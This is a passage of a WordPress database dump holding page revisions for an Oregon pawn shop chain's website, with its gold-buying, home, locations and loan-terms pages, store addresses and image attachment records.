minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"aligncenter wp-image-223 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-1024x1024.jpg\" alt=\"Gold Jewelry\" width=\"604\" height=\"604\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:35:14','2015-03-10 23:35:14','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(242,2,'2015-03-10 16:40:59','2015-03-10 23:40:59','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"aligncenter wp-image-223 \" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-1024x1024.jpg\" alt=\"Gold Jewelry\" width=\"424\" height=\"424\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:40:59','2015-03-10 23:40:59','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(243,2,'2015-03-10 16:48:22','2015-03-10 23:48:22','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-e1426031253556.jpg\"><img class=\"aligncenter wp-image-223 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-e1426031253556-1024x723.jpg\" alt=\"\" width=\"604\" height=\"426\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:48:22','2015-03-10 23:48:22','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(244,1,'2015-03-10 17:15:14','2015-03-11 00:15:14','','gun','','inherit','open','open','','gun','','','2015-03-10 17:15:14','2015-03-11 00:15:14','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/gun.jpg',0,'attachment','image/jpeg',0),(245,1,'2015-03-10 17:15:18','2015-03-11 00:15:18','','ring','','inherit','open','open','','ring','','','2015-03-10 17:15:18','2015-03-11 00:15:18','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ring.jpg',0,'attachment','image/jpeg',0),(246,1,'2015-03-10 17:15:22','2015-03-11 00:15:22','A wall with vintage guitars hanging on display.','Vintage Guitars','','inherit','open','open','','vintage-guitars-2','','','2015-03-10 17:15:22','2015-03-11 00:15:22','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/guitar.jpg',0,'attachment','image/jpeg',0),(247,1,'2015-03-10 17:16:36','2015-03-11 00:16:36','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/guitar.jpg\" alt=\"Guitars\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ring.jpg\" alt=\"Rings\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/gun.jpg\" alt=\"Guns\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 17:16:36','2015-03-11 00:16:36','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(248,1,'2015-03-10 17:29:04','2015-03-11 00:29:04','','North-Lombard','','inherit','open','open','','north-lombard','','','2015-03-10 17:29:51','2015-03-11 00:29:51','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/North-Lombard.jpg',0,'attachment','image/jpeg',0),(249,1,'2015-03-10 17:29:55','2015-03-11 00:29:55','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>N. PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/North-Lombard.jpg\"><img class=\"alignnone size-medium wp-image-248\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/North-Lombard-300x215.jpg\" alt=\"North Lombard store, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg\"><img class=\"alignnone size-medium wp-image-166\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside.jpg\"><img class=\"alignnone size-medium wp-image-169\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside.jpg\"><img class=\"alignnone size-medium wp-image-168\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-10 17:29:55','2015-03-11 00:29:55','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(251,1,'2015-03-10 18:46:52','2015-03-11 01:46:52','A wall with vintage guitars hanging on display.','Vintage Guitars','','inherit','open','open','','vintage-guitars-3','','','2015-03-10 18:46:52','2015-03-11 01:46:52','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/guitar-390.jpg',0,'attachment','image/jpeg',0),(252,1,'2015-03-10 18:46:56','2015-03-11 01:46:56','','ring-390','','inherit','open','open','','ring-390','','','2015-03-10 18:46:56','2015-03-11 01:46:56','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ring-390.jpg',0,'attachment','image/jpeg',0),(253,1,'2015-03-10 18:47:00','2015-03-11 01:47:00','','gun-390','','inherit','open','open','','gun-390','','','2015-03-10 18:47:00','2015-03-11 01:47:00','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/gun-390.jpg',0,'attachment','image/jpeg',0),(254,1,'2015-03-10 18:47:47','2015-03-11 01:47:47','[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar-390.jpg\" banner_link=\"#\" title=\"Guitars\" text=\"We have guitars\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/ring-390.jpg\" banner_link=\"#\" title=\"Rings\" text=\"We have rings\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/gun-390.jpg\" banner_link=\"#\" title=\"Guns\" text=\"We have guns\" btn_text=\" \" target=\"_self\"]\r\n[clear]\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 18:47:47','2015-03-11 01:47:47','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(256,2,'2015-03-10 22:07:09','2015-03-11 05:07:09','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:07:09','2015-03-11 05:07:09','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(258,2,'2015-03-10 22:12:11','2015-03-11 05:12:11','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:12:11','2015-03-11 05:12:11','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(257,2,'2015-03-10 22:10:30','2015-03-11 05:10:30','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n</ul>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<ul class=\"listing-check\">\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:10:30','2015-03-11 05:10:30','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(261,2,'2015-03-10 22:16:10','2015-03-11 05:16:10','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n \r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:16:10','2015-03-11 05:16:10','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(259,2,'2015-03-10 22:13:07','2015-03-11 05:13:07','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div 